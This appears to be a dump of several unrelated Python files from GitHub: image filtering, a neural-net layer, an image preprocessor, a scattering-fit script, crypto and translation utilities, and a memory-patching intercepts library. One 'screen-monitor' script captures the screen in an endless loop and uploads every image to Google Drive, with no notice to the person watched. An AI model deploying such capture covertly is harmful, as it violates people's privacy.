+= 1\n\t\n\tfor x in range(gaussian_mask_size * gaussian_mask_size):\n\t\tresult += enlarged_image[mask_index[x][0]][mask_index[x][1]] * w[x]\n\n\tresult /= sum\n\t#print result\n\t#print mask_index\n\n\treturn result\n\ndef gaussian_filter(gaussian_mask_size, origin_image):\n\tenlarged_image = enlarge_image(gaussian_mask_size / 2, origin_image)\n\twidth = len(origin_image)\n\theight = len(origin_image[0])\n\tblured_image = [[255 for i in range(height)] for j in range(width)]\n\tw = get_w(gaussian_mask_size)\n\t\n\tsum = 0.0\n\n\tfor i in range(len(w)):\n\t\tsum += w[i]\n\n\tfor x in range(width):\n\t\tfor y in range(height):\n\t\t\tblured_image[x][y] = count_gaussian_pixel(x, y, enlarged_image, gaussian_mask_size, w, sum)\n\n\treturn blured_image\n\ndef gmask(origin_image, blured_image):\n\twidth = len(origin_image)\n\theight = len(origin_image[0])\n\tgmasked_image = [[255 for i in range(height)] for j in range(width)]\n\n\tfor x in range(width):\n\t\tfor y in range(height):\n\t\t\tgmasked_image[x][y] = origin_image[x][y] - blured_image[x][y]\n\t\n\treturn gmasked_image\n\ndef scal(gmasked_image):\n\twidth = len(gmasked_image)\n\theight = len(gmasked_image[0])\n\tscaled_image = [[255 for i in range(height)] for j in range(width)]\n\n\tfor x in range(width):\n\t\tfor y in range(height):\n\t\t\tscaled_image[x][y] = ( gmasked_image[x][y] + 255 ) / 2\n\n\treturn scaled_image\n\ndef unsharp_mask(origin_image, gmasked_image, k):\n\twidth = len(origin_image)\n\theight = len(origin_image[0])\n\tunsharp_image = [[255 for i in range(height)] for j in range(width)]\n\n\tfor x in range(width):\n\t\tfor y in range(height):\n\t\t\tunsharp_image[x][y] = origin_image[x][y] + k * gmasked_image[x][y]\n\n\treturn unsharp_image\n\n# function to print the image so as to see the enlarge function's output image\ndef print_image(image_array, image_print_name):\n\twidth = len(image_array)\n\theight = len(image_array[0])\n\n\tprintImage = Image.new('L',(width, height), 'white')\n\tdraw = ImageDraw.Draw(printImage)\t\n\n\tfor i in range(width):\n\t\tfor j in range(height):\n\t\t\tdraw.point((i, j), image_array[i][j])\n\n\tfilename = image_print_name + '.bmp'\n\tprintImage.save(filename, format='BMP')\t\t\n\n# open an image and get its information\nimage_name = 'Fig0340(a)(dipxe_text)'\nim = Image.open(image_name+'.tif')\ndata = im.load()\nwidth, height = im.size\ngaussian_mask_size = 5\norigin_image = [[ 255 for i in range(height)] for j in range(width)]\nk = 3\n\nget_origin()\n\nblured_image = gaussian_filter(gaussian_mask_size, origin_image)\ngmasked_image = gmask(origin_image, blured_image)\nscal_gmasked_image = scal(gmasked_image)\nunsharp_masking_image = unsharp_mask(origin_image, gmasked_image, 1)\nhighboost_filter_image = unsharp_mask(origin_image, gmasked_image, k)\n\nprint_image(origin_image, 'origin_image')\nprint_image(blured_image, 'gaussian_blured_image')\nprint_image(scal_gmasked_image, 'scal_gmasked_image')\nprint_image(unsharp_masking_image, 'unsharp')\nprint_image(highboost_filter_image, 'highboost_filter_image')\n","repo_name":"FionaT/Digital-Image-Processing_Proj","sub_path":"proj_3/0305/proj_03-05-b.py","file_name":"proj_03-05-b.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21386976698","text":"'''\n图像梯度:计算图像像素某个领域的灰度变化,类似导数,图像梯度变化较大时,可能是边缘\n'''\n\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('image.bmp',0)\n\nlaplacian = cv2.Laplacian(img, cv2.CV_64F)\nsobelx = cv2.Sobel(img, cv2.CV_64F,1,0,ksize=5)\nsobely = cv2.Sobel(img, cv2.CV_64F,0,1,ksize=5)\n\nplt.subplot(2,2,1), plt.imshow(img, cmap='gray')\nplt.title('Origional'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,2,2),plt.imshow(laplacian,cmap = 'gray')\nplt.title('Laplacian'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,2,3),plt.imshow(sobelx,cmap = 'gray')\nplt.title('Sobel X'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,2,4),plt.imshow(sobely,cmap = 'gray')\nplt.title('Sobel Y'), plt.xticks([]), plt.yticks([])\n\nplt.show()\n\n","repo_name":"slientreed/opencv_python_learn","sub_path":"3_images_processing_in_openCV/6_Image_Gradients.py","file_name":"6_Image_Gradients.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"34408728650","text":"from cool_net.neuron import Neuron\nfrom cool_net.funcs import Funcs\n\nclass Layer:\n activation_funcs = [\"linear\",\"relu\",\"sigmoid\", \"tanh\",\"leaky_relu\"]\n\n def __init__(self, \n input_dimension, \n neuron_count, \n activation_func,\n weight_init_technique=\"random\",\n bias_init_technique=\"zero\"):\n if activation_func not in Layer.activation_funcs:\n raise Exception(f\"Error: activation function {activation_func} is not valid.\")\n self.activation_func = activation_func\n if weight_init_technique not in Neuron.techniques_weight_init:\n print(f\"Warning: weight initialization technique {weight_init_technique} not valid. using {Neuron.default_weight_init}\")\n weight_init_technique = Neuron.default_weight_init\n if bias_init_technique not in Neuron.techniques_bias_init:\n print(f\"Warning: bias initialization technqiue {bias_init_technique} is not valid. using {Neuron.default_bias_init}.\")\n bias_init_technique = Neuron.default_bias_init\n self.n_count = neuron_count\n self.n = [Neuron(input_dimension,weight_init_technique,bias_init_technique) for i in range(self.n_count)]\n\n def forward(self, x):\n return [neuron.forward(x) for neuron in self.n]\n \n def forward_pass(self, x):\n outputs = self.forward(x)\n if self.activation_func == \"linear\":\n return [Funcs.linear(output) for output in outputs]\n if self.activation_func == \"relu\":\n return [Funcs.relu(output) for output in outputs]\n if self.activation_func == \"sigmoid\":\n return [Funcs.sigmoid(output) for output in outputs]\n if self.activation_func == \"tanh\":\n return [Funcs.tanh(output) for output in outputs]\n if self.activation_func == \"leaky_relu\":\n return [Funcs.leaky_relu(output) for output in outputs]\n \n def load_params(self, params: dict):\n for i in range(self.n_count):\n self.n[i].load_weights(params[i]['w'])\n self.n[i].load_bias(params[i]['b'])\n \n def get_params(self) -> dict:\n params = {}\n for i in range(self.n_count):\n params[i] = {}\n params[i][\"b\"] = self.n[i].get_bias()\n params[i][\"w\"] = self.n[i].get_weights()\n return params\n ","repo_name":"lucriver/CoolNet","sub_path":"cool_net/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"7435861925","text":"import numpy as np\nimport torch\n\n\nclass Preprocessor(object):\n \"\"\"\n Object to deal with preprocessing.\n Easier than defining a function.\n \"\"\"\n def __init__(self,\n image_range,\n input_range,\n mean,\n sdev,\n channels_last=True):\n self.image_range = image_range\n self.input_range = input_range\n self.mean = mean\n self.sdev = sdev\n self.channels_last = channels_last\n self.num_channels = None\n\n def __call__(self, img):\n if not isinstance(self.num_channels, (int, float)):\n self.num_channels = img.shape[-1] if self.channels_last else img.shape[0]\n\n if isinstance(img, np.ndarray):\n img = img.astype(\"float\")\n elif isinstance(img, torch.Tensor):\n img = img.float()\n\n # Preprocess an input image\n image_min = float(self.image_range[0])\n image_max = float(self.image_range[1])\n model_min = float(self.input_range[0])\n model_max = float(self.input_range[1])\n image_range = image_max - image_min\n model_range = model_max - model_min\n img = (((img - image_min) * model_range) / image_range) + model_min\n\n assert len(self.mean) == len(self.sdev)\n assert len(self.mean) in [self.num_channels, 1], \"Number of image normalization parameters must match number \" \\\n \"of channels or equal 1\"\n\n if len(self.mean) == self.num_channels:\n for channel in range(self.num_channels):\n if self.channels_last:\n img[..., channel] -= self.mean[channel]\n img[..., channel] /= self.sdev[channel]\n else:\n img[channel] -= self.mean[channel]\n img[channel] /= self.sdev[channel]\n else:\n img -= self.mean[0]\n img /= self.sdev[0]\n\n return img\n\n def denormalize(self, img):\n if len(self.mean) == self.num_channels:\n for channel in range(self.num_channels):\n if self.channels_last:\n img[..., channel] *= self.sdev[channel]\n img[..., channel] += self.mean[channel]\n else:\n img[channel] *= self.sdev[channel]\n img[channel] += self.mean[channel]\n else:\n img *= self.sdev[0]\n img += self.mean[0]\n\n image_min = float(self.image_range[0])\n image_max = float(self.image_range[1])\n model_min = float(self.input_range[0])\n model_max = float(self.input_range[1])\n image_range = image_max - image_min\n model_range = model_max - model_min\n\n img = ((img - model_min) * image_range) / model_range + image_min\n return img\n","repo_name":"i-pan/kaggle-rsna-cspine","sub_path":"src/skp/data/transforms/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"94"} +{"seq_id":"25771663120","text":"#Initialized ScriptFactory v0.2\n#Date: 2018-07-09 16:10:34.437894\n#Author(s)/Contact:\n#Dominique Dresen\t Dominique.Dresen@uni-koeln.de\n\n#Preparing Script for Experiment: MODELEXP\nfrom modelexp import App\nfrom modelexp.experiments.sas import SimultaneousSaxsSansSanspol\nfrom modelexp.models.sas import SphereCSSCoupled, InstrumentalResolution, Magnetic\nfrom modelexp.data import XyeData\nfrom modelexp.fit import LevenbergMarquardt\n\nfrom thesis_utils.materials import sld_xray_GALAXI, sld_neutrons_5A\n\napp = App()\nexpRef = app.setExperiment(SimultaneousSaxsSansSanspol)\n\ndataRef = app.setData(XyeData)\n\n\ndataRef.loadFromFile('../experimentalData/PMK18.xye', ['saxs'])\ndataRef.loadFromFile('../experimentalData/PMK18_LSDD_Nuclear20.dat', ['sans', 'sa'])\ndataRef.loadFromFile('../experimentalData/PMK18_SSDD_Nuclear20.dat', ['sans', 'la'])\n\ndataRef.loadFromFile('../experimentalData/PMK18_SSDD_Mag20_I+.dat', ['sans', 'p', 'la'])\ndataRef.loadFromFile('../experimentalData/PMK18_SSDD_Mag20_I-.dat', ['sans', 'm', 'la'])\ndataRef.loadFromFile('../experimentalData/PMK18_LSDD_Mag20_I+.dat', ['sans', 'p', 'sa'])\ndataRef.loadFromFile('../experimentalData/PMK18_LSDD_Mag20_I-.dat', ['sans', 'm', 'sa'])\n\ndataRef.sliceDomain(0.01, 0.5)\ndataRef.plotData()\n\nmodelRef = app.setModel(SphereCSSCoupled, [Magnetic, InstrumentalResolution])\nmodelRef.setParam(\"magSldCore\", 1.085e-06, minVal = 0, maxVal = 5e-06, vary = True)\nmodelRef.setParam(\"magSldShell\", 5e-09, minVal = 0, maxVal = 5e-06, vary = True)\n\nmodelRef.setParam(\"particleSize\", 53.52532255801053, minVal = 0, maxVal = 80, vary = True)\nmodelRef.setParam(\"dShell\", 3.06788487244511, minVal = 0, maxVal = 80, vary = True)\nmodelRef.setParam(\"dSurfactant\", 21.28, minVal = 0, maxVal = 80, vary = True)\nmodelRef.setParam(\"sigParticleSize\", 0.0579, minVal = 0, maxVal = 0.1, vary = True)\nmodelRef.setParam(\"i0_sans\", 0.028, minVal = 0, maxVal = 1, vary = True)\nmodelRef.setParam(\"bg_sans\", 0.0, minVal = 0, maxVal = 0.02, vary = False)\nmodelRef.setParam(\"i0_saxs\", 0.3193553851380457, minVal = 0, maxVal = 1, vary = True)\nmodelRef.setParam(\"bg_saxs\", 0.0010600000000000002, minVal = 0, maxVal = 0.02, vary = False)\n\nmodelRef.setConstantParam(\"sigD\", 0.)\nmodelRef.setConstantParam(\"sldCore_sans\", 8.34e-6)\nmodelRef.setConstantParam(\"sldShell_sans\", 7.00e-6)\nmodelRef.setConstantParam(\"sldSurfactant_sans\", 0.078e-6)\nmodelRef.setConstantParam(\"sldSolvent_sans\", 5.66e-6)\nmodelRef.setConstantParam('wavelength', 5.9984)\nmodelRef.setConstantParam('dWavelength', 0.04247)\nmodelRef.setConstantParam(\"dTheta_sa\", 0.0021)\nmodelRef.setConstantParam(\"dTheta_la\", 0.0038)\n\nmodelRef.setConstantParam(\"sldCore_saxs\", 52.07e-6)\nmodelRef.setConstantParam(\"sldShell_saxs\", 41.85e-6)\nmodelRef.setConstantParam(\"sldSurfactant_saxs\", 8.52e-6)\nmodelRef.setConstantParam(\"sldSolvent_saxs\", 7.55e-6)\nmodelRef.updateModel()\n\napp.setFit(LevenbergMarquardt)\n\napp.show()","repo_name":"DomiDre/PhDThesis","sub_path":"data/looselyPackedNP/ios-11/sas/sim_saxs_sans_sanspol/MODELEXP_sasCoreshell.py","file_name":"MODELEXP_sasCoreshell.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20819214491","text":"import os, os.path\nfrom datetime import date\n\nfrom googleapiclient import discovery\nfrom googleapiclient.http import MediaFileUpload \nfrom httplib2 import Http\nfrom httplib2.error import ServerNotFoundError\nfrom oauth2client import file, client, tools\nimport pyscreenshot\n\n# Obtaining application credentials & Authenticating\nSCOPES = 'https://www.googleapis.com/auth/drive'\nstore = file.Storage('storage.json')\ncreds = store.get()\nif not creds or creds.invalid:\n flow = client.flow_from_clientsecrets('credentials.json', SCOPES)\n creds = tools.run_flow(flow, store)\n\n# Creating Service \nDRIVE = discovery.build('drive', 'v3', http=creds.authorize(Http()))\n\ndef get_file_details(file_name, mime_type, parent_file_id = None):\n if parent_file_id == None :\n file_list = DRIVE.files().list(q = f\"name = '{file_name}' and mimeType = '{mime_type}'\").execute().get('files')\n else:\n file_list = DRIVE.files().list(q = f\"parents = '{parent_file_id}' and name = '{file_name}' and mimeType = '{mime_type}'\").execute().get('files')\n if len(file_list) == 0 :\n print(\"No Files Found, fileDetails()\")\n elif len(file_list) == 1:\n file_details = file_list[0]\n return file_details\n else:\n print(\"More Than One File Found, fileDetails()\")\n\ndef create_folder(new_folder_name, parent_folder_id = None, should_return_details = False):\n folder_metadata = {\n 'name' : new_folder_name,\n 'mimeType' : 'application/vnd.google-apps.folder'\n }\n if parent_folder_id is not None:\n folder_metadata['parents'] = [parent_folder_id]\n DRIVE.files().create(body = folder_metadata).execute()\n if should_return_details:\n return get_file_details(new_folder_name,'application/vnd.google-apps.folder', parent_file_id = parent_folder_id)\n\ndef check_folder_exits(folder_name, parent_folder_id = None):\n if parent_folder_id == None:\n folder = DRIVE.files().list(q = f\"name = '{folder_name}' and mimeType = 'application/vnd.google-apps.folder'\").execute().get('files')\n else:\n folder = DRIVE.files().list(q = f\"parents = '{parent_folder_id}' and name = '{folder_name}' and mimeType = 'application/vnd.google-apps.folder'\").execute().get('files') \n if len(folder) == 1:\n return True\n elif len(folder) > 1:\n pass\n else:\n return False\n\ndef upload_file(to_folder_id, file_name, mime_type):\n file_metadata = {\n 'name' : file_name,\n 'parents' : [to_folder_id],\n 'mimeType' : mime_type}\n media = MediaFileUpload(file_name)\n try:\n DRIVE.files().create(\n body = file_metadata,\n media_body = media\n ).execute()\n print(file_name)\n except TimeoutError:\n print(\"TimeOut Error\")\n\ndef find_img_num(img_folder_id):\n files = DRIVE.files().list(q = f\"parents = '{img_folder_id}'\", pageSize = 1).execute().get('files')\n if len(files) == 0:\n return 0\n else:\n return int(files[0]['name'][5:][:-4])\n\ndef take_image(img_num):\n ss = pyscreenshot.grab()\n ss.save(f\"photo{img_num}.png\")\n return f\"photo{img_num}.png\"\n\ndef client_test_and_details(application_folder_id):\n client_name = os.getlogin() \n client_status = check_folder_exits(client_name, application_folder_id)\n if not client_status:\n return create_folder(application_folder_id, client_name, should_return_details = True) \n else :\n return get_file_details(client_name, 'application/vnd.google-apps.folder',parent_file_id = application_folder_id)\n\ndef current_day_folder(client_folder_id, current_date = str(date.today())):\n if check_folder_exits(current_date, client_folder_id):\n return get_file_details(current_date, 'application/vnd.google-apps.folder',parent_file_id = client_folder_id)\n else:\n return create_folder(client_folder_id, current_date, should_return_details = True)\n\ndef check_trashed(file_id):\n return DRIVE.files().get(fileId = file_id, fields='parents,name,trashed').execute().get('trashed')\n\ndef main():\n if check_folder_exits('pno01-screen-monitor'):\n parent_folder_id = get_file_details('pno01-screen-monitor', 'application/vnd.google-apps.folder').get('id') \n else:\n parent_folder_id = create_folder('pno01-screen-monitor', should_return_details = True).get('id') \n client_details = client_test_and_details(parent_folder_id)\n current_day_details = current_day_folder(client_details.get('id'))\n img_num = find_img_num(current_day_details.get('id'))\n while True:\n data_folder_id = current_day_details.get('id')\n photo_file = take_image(img_num)\n upload_file(data_folder_id, photo_file, 'image/png')\n os.remove(photo_file)\n img_num += 1 \n\nif __name__ == '__main__':\n main()","repo_name":"hellosafwaan/screen-monitor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20194445764","text":"import socket\nimport time\nimport datetime\nfrom hashlib import md5, sha1\nimport emoji\nfrom googletrans import Translator\nfrom typing import List, Dict\nimport urllib.parse\nfrom . import crawl\nimport json\nimport re\nimport base64\nfrom Crypto.Cipher import AES\n\n\ndef get_local_ip():\n \"\"\"\n 获取本地内网ip\n \"\"\"\n ip = None\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect(('8.8.8.8', 80))\n ip = s.getsockname()[0]\n s.close()\n except:\n pass\n return ip\n\n\ndef encrypt(char, method='md5'):\n \"\"\"\n 支持md5和sha1加密方式\n :param char:\n :param method:\n :return:\n \"\"\"\n char = str(char)\n if method == 'md5':\n m = md5()\n elif method == 'sha1':\n m = sha1()\n m.update(char.encode('utf8'))\n return m.hexdigest()\n\n\ndef stamp_to_date(time_int: int or str):\n '''\n 时间戳转GTM+8(东八区)时间,\n :param time_int:\n :param time_int(int): 十位数时间戳\n :return(datatime): 时间\n\n examples:\n print(time_stamp(1547111111))\n '''\n ll = len(str(time_int))\n if isinstance(time_int, str):\n time_int = int(time_int[:10])\n if ll > 10:\n time_int = int(time_int / 10 ** (ll - 10))\n\n chTime = time.localtime(time_int)\n output = time.strftime(\"%Y-%m-%d %H:%M:%S\", chTime)\n return output\n\n\n# 当前时间转固定格式\ndef date_to_char(type='s', ctime=None, seperation=None):\n \"\"\"\n 当前时间转成年月日时分秒形式\n :return:\n \"\"\"\n if not ctime:\n ctime = datetime.datetime.now()\n if type == 's':\n char = ctime.strftime('%Y_%m_%d_%H_%M_%S')\n elif type == 'm':\n char = ctime.strftime('%Y_%m_%d_%H_%M')\n if seperation is None:\n return char.replace('_', '')\n elif seperation == 'normal':\n char = ctime.strftime('%Y-%m-%d %H:%M:%S')\n else:\n char = ctime.strftime('%Y_%m_%d_%H_%M_%S').replace('_', seperation)\n return char\n\n\n# 定时器\ndef control(star_time: int or float = 0,\n cycle: int or float = 86400,\n scope: int or float = 100):\n \"\"\"\n :param star_time: 任务开始时间\n :param cycle: 任务周期\n :param scope: 开始时间波动范围\n :return:\n \"\"\"\n if scope + star_time * 3600 <= (int(time.time()) + 8 * 3600) % cycle <= scope * 2 + star_time * 3600:\n return 1\n else:\n return 0\n\n\ndef emoji_transfer(chars: str or List[str]) -> str or List[str]:\n \"\"\"\n 对字符的表情进行转换\n :param char:\n :return:\n \"\"\"\n result = []\n if isinstance(chars, list):\n for char in chars:\n result.append(emoji.demojize(char))\n return result\n else:\n return emoji.demojize(chars)\n\n\ndef google_trans(chars: str or List[str] or iter,\n translator: Translator = None,\n return_type: str = 'list',\n dest='en',\n service_urls=['translate.google.cn']) -> List[str]:\n \"\"\"\n 谷歌翻译\n :param chars:\n :param translator:\n :param return_type:\n :return:\n \"\"\"\n if isinstance(chars, str):\n chars = [chars]\n if not translator:\n translator = Translator(service_urls=service_urls)\n result = translator.translate(chars, dest=dest)\n if return_type == 'list':\n return list(map(lambda x: x.text, result))\n else:\n return result\n\n\ndef baidu_trans(app_id: str,\n secret_key: str,\n query: str,\n from_lan: str = 'auto',\n to_lan: str = 'en',\n salt='robbe'\n ):\n \"\"\"\n\n :param app_id: your baidu api app_id\n :param secret_key: your baidu api secret_key\n :param query: something need to translate\n :param from_lan: from 【xxx】 language\n :param to_lan: to 【xxx】 language\n :param salt: salt\n :return:\n \"\"\"\n\n sign = app_id + query + str(salt) + secret_key\n sign = md5(sign.encode()).hexdigest()\n nn = 0\n while nn < 10:\n try:\n sub_url = '/api/trans/vip/translate' + '?appid=' + app_id + '&q=' + urllib.parse.quote(\n query) + '&from=' + from_lan + '&to=' + to_lan + '&salt=' + str(\n salt) + '&sign=' + sign\n\n url = 'https://fanyi-api.baidu.com/api/trans/vip/translate' + sub_url\n html = crawl.crawl(url).html\n data = json.loads(html)\n des_sentence = data['trans_result'][0]['dst']\n return des_sentence\n except Exception as e:\n print(e)\n nn += 1\n return None\n\n\ndef cprint(*char, c=None):\n '''\n 打印有颜色字体\n :param char(str or *str): 需要print的字符,可print多组字符\n :param c(list or str): 如果为str,则所有字体都是一个颜色;如果为list,长度需=字符组长度\n :return:\n\n examples:\n cprint('aaa', 'bbb','ccc', c=['r', 'g', 'b'])\n '''\n dic = {'r': '91',\n 'g': '92',\n 'y': '93',\n 'b': '94',\n 'p': '95',\n 'q': '96',\n 'z': '107,'\n }\n if c is None:\n print(*char)\n return\n\n if len(char) > len(c) and isinstance(c, list):\n c = c[0]\n\n try:\n if type(c) == str and c in dic:\n print(*(map(lambda x: '\\033[' + dic[c] + 'm' + str(x) + '\\033[0m', char)))\n return\n if type(c) == list:\n if len(c) != len(char):\n print(*(map(lambda x: '\\033[' + dic['z'] + 'm' + str(x) + '\\033[0m', char)))\n return\n else:\n print(*(map(lambda x, y: '\\033[' + dic[y] + 'm' + str(x) + '\\033[0m', char, c)))\n return\n except Exception as e:\n print(*char)\n return\n\n\ndef bytes_to_string(bytes_array):\n \"\"\"\n byte array to string, mainly used in Java type codes\n \"\"\"\n result = ''\n i = 0\n while i < len(bytes_array):\n value = bytes_array[i]\n if value >= 0:\n char = chr(value)\n i += 1\n else:\n tmp = ''\n values = bytes_array[i:i + 3]\n for value in values:\n value = 256 + value\n tmp += str(hex(value)).replace('0x', '\\\\x')\n i += 3\n char = eval(repr(tmp.encode('utf8')).replace('\\\\\\\\', '\\\\'))\n char = char.decode('utf8')\n result += char\n return result\n\n\ndef string_to_bytes(string):\n \"\"\"\n string array to byte, mainly used in Java type codes\n \"\"\"\n result = []\n for i in string:\n num = ord(i)\n if num < 256:\n result.append(num)\n if num > 255:\n values = bytes(i, encoding='utf8')\n values = re.findall('\\\\\\\\x[a-zA-Z0-9]{2}', str(values))\n values = list(map(lambda x: x.replace('\\\\', '0'), values))\n for value in values:\n result.append(- (256 - int(value, base=16)))\n return result\n\n\nclass Encryption:\n \"\"\"\n 加密模块\n \"\"\"\n\n @staticmethod\n def md5(char: str):\n char = str(char)\n m = md5()\n m.update(char.encode('utf8'))\n return m.hexdigest()\n\n @staticmethod\n def sha1(char: str):\n char = str(char)\n m = sha1()\n m.update(char.encode('utf8'))\n return m.hexdigest()\n\n class AESdiy:\n\n @staticmethod\n def aes_padding(text):\n bs = AES.block_size\n length = len(text)\n bytes_length = len(bytes(text, encoding='utf-8'))\n aes_padding_size = length if (bytes_length == length) else bytes_length\n aes_padding_l = bs - aes_padding_size % bs\n aes_padding_text = chr(aes_padding_l) * aes_padding_l\n return text + aes_padding_text\n\n @staticmethod\n def aes_unpadding(text):\n length = len(text)\n aes_unpadding_l = ord(text[length - 1])\n return text[0:length - aes_unpadding_l]\n\n @staticmethod\n def aes_encrypt(salt, content):\n ll = len(salt)\n assert ll <= 16, \"Length must less equal than 16 !\"\n for i in range(16 - ll):\n salt += '0'\n salt_bytes = bytes(salt, encoding='utf-8')\n cipher = AES.new(salt_bytes, AES.MODE_CBC, salt_bytes)\n content_aes_padding = Encryption.AESdiy.aes_padding(content)\n aes_encrypt_bytes = cipher.encrypt(bytes(content_aes_padding, encoding='utf-8'))\n aes_encrypt_char = str(base64.b64encode(aes_encrypt_bytes), encoding='utf-8')\n return aes_encrypt_char\n\n @staticmethod\n def aes_decrypt(salt, content):\n ll = len(salt)\n assert ll <= 16, \"Length must less equal than 16 !\"\n for i in range(16 - ll):\n salt += '0'\n salt_bytes = bytes(salt, encoding='utf-8')\n cipher = AES.new(salt_bytes, AES.MODE_CBC, salt_bytes)\n aes_encrypt_bytes = base64.b64decode(content)\n aes_decrypt_bytes = cipher.decrypt(aes_encrypt_bytes)\n aes_decrypt_char = str(aes_decrypt_bytes, encoding='utf-8')\n aes_decrypt_char = Encryption.AESdiy.aes_unpadding(aes_decrypt_char)\n return aes_decrypt_char\n\n\n\n\n\nprint(1)\nprint(2)\nprint('dev1')","repo_name":"robbebluecp/pack","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"34379741256","text":"from cqase.models import ResponseModel\n\n\nclass CustomFieldsApi:\n def __init__(self, app):\n self.app = app\n\n _GET_ALL_FIELDS = \"/custom_field\"\n _POST_NEW_FIELDS = \"/custom_field\"\n _GET_CUSTOM_FIELDS_BY_ID = \"/custom_field/{}\"\n _DELETE_CUSTOM_FIELDS = \"/custom_field/{}\"\n _UPDATE_CUSTOM_FIELDS = \"/custom_field/{}\"\n\n def get_all(self, params: dict = None) -> ResponseModel:\n \"\"\"\n https://developers.qase.io/reference/get-custom-fields\n \"\"\"\n return self.app.client.request(\n method=\"GET\",\n url=f\"{self.app.base_path}{self._GET_ALL_FIELDS}\",\n params=params,\n )\n\n def create(self, body: dict):\n \"\"\"\n https://developers.qase.io/reference/create-custom-field\n \"\"\"\n return self.app.client.request(\n method=\"POST\",\n url=f\"{self.app.base_path}{self._POST_NEW_FIELDS}\",\n json=body,\n )\n\n def get_by_id(self, uuid: int) -> ResponseModel:\n \"\"\"\n https://developers.qase.io/reference/get-custom-field\n \"\"\"\n return self.app.client.request(\n method=\"GET\",\n url=f\"{self.app.base_path}{self._GET_CUSTOM_FIELDS_BY_ID.format(uuid)}\",\n )\n\n def delete(self, uuid: int) -> ResponseModel:\n \"\"\"\n https://developers.qase.io/reference/delete-custom-field\n \"\"\"\n return self.app.client.request(\n method=\"DELETE\",\n url=f\"{self.app.base_path}{self._DELETE_CUSTOM_FIELDS.format(uuid)}\",\n )\n\n def update(self, uuid: int, body: dict) -> ResponseModel:\n \"\"\"\n https://developers.qase.io/reference/update-custom-field\n \"\"\"\n return self.app.client.request(\n method=\"PATCH\",\n url=f\"{self.app.base_path}{self._UPDATE_CUSTOM_FIELDS.format(uuid)}\",\n json=body,\n )\n","repo_name":"berpress/custom-qase-client","sub_path":"cqase/api/custom_fields.py","file_name":"custom_fields.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41793313876","text":"\"\"\"\r\nintercepts.registration\r\n~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nThis module implements the intercepts registration api.\r\n\"\"\"\r\nfrom __future__ import annotations\r\n\r\nimport atexit\r\nimport ctypes\r\nimport struct\r\nimport sys\r\nimport types\r\nfrom collections import defaultdict\r\nfrom typing import Any, Callable, Type, TypeVar, cast\r\n\r\nfrom ._handlers import PTR_SIZE, get_addr, replace_cfunction\r\nfrom ._utils import replace_load_global\r\n\r\nT = TypeVar(\"T\")\r\n_HANDLERS: dict[tuple[int, Type], list[tuple[Any, ...]]] = defaultdict(list)\r\n\r\n\r\ndef _check_intercept(obj, handler):\r\n if not isinstance(handler, types.FunctionType):\r\n raise ValueError(\"Argument `handler` must be a function.\")\r\n if obj == handler:\r\n raise ValueError(\"A function cannot handle itself\")\r\n\r\n\r\ndef register(obj: T, handler: Callable) -> T:\r\n r\"\"\"Registers an intercept handler.\r\n\r\n :param obj: The callable to intercept.\r\n :param handler: A function to handle the intercept.\r\n :returns: The intercepted callable.\r\n\r\n Usage::\r\n\r\n >>> import intercepts\r\n >>> increment = lambda x: x + 1\r\n >>> handler = lambda func, arg: arg - (func(arg) - arg)\r\n >>> intercepts.register(increment, handler)\r\n >>> increment(43)\r\n 42\r\n \"\"\"\r\n _register: dict[Type, Callable[[Any, types.FunctionType], Any]] = {\r\n types.BuiltinFunctionType: _register_builtin,\r\n types.FunctionType: _register_function,\r\n types.MethodType: _register_method,\r\n }\r\n obj_type = type(obj)\r\n if obj_type not in _register:\r\n raise NotImplementedError(f\"Unsupported type: {obj_type}\")\r\n _check_intercept(obj, handler)\r\n assert isinstance(handler, types.FunctionType)\r\n return _register[obj_type](obj, handler)\r\n\r\n\r\ndef _register_builtin(\r\n obj: types.BuiltinFunctionType, handler: types.FunctionType\r\n) -> types.BuiltinFunctionType:\r\n obj_addr = get_addr(obj)\r\n _obj_bytes = ctypes.string_at(obj_addr, sys.getsizeof(obj))\r\n _obj = ctypes.cast(\r\n cast(ctypes._SimpleCData, _obj_bytes),\r\n ctypes.py_object,\r\n ).value\r\n\r\n globals_dict = handler.__globals__\r\n _code = replace_load_global(handler.__code__, \"_\", _obj)\r\n _handler = types.FunctionType(\r\n code=_code,\r\n globals=handler.__globals__,\r\n name=handler.__name__,\r\n argdefs=handler.__defaults__,\r\n closure=handler.__closure__,\r\n )\r\n\r\n refs = replace_cfunction(obj, _handler)\r\n _HANDLERS[obj_addr, type(obj)].append(\r\n (refs, (_handler, obj, _obj, handler, globals_dict), _obj_bytes)\r\n )\r\n\r\n # Need to increment reference count of _obj_bytes to avoid segfaults\r\n ctypes.memmove(\r\n get_addr(_obj_bytes),\r\n struct.pack(\r\n \"N\",\r\n struct.unpack(\"N\", ctypes.string_at(get_addr(_obj_bytes), PTR_SIZE))[0] + 1,\r\n ),\r\n PTR_SIZE,\r\n )\r\n\r\n return obj\r\n\r\n\r\ndef _register_function(\r\n obj: 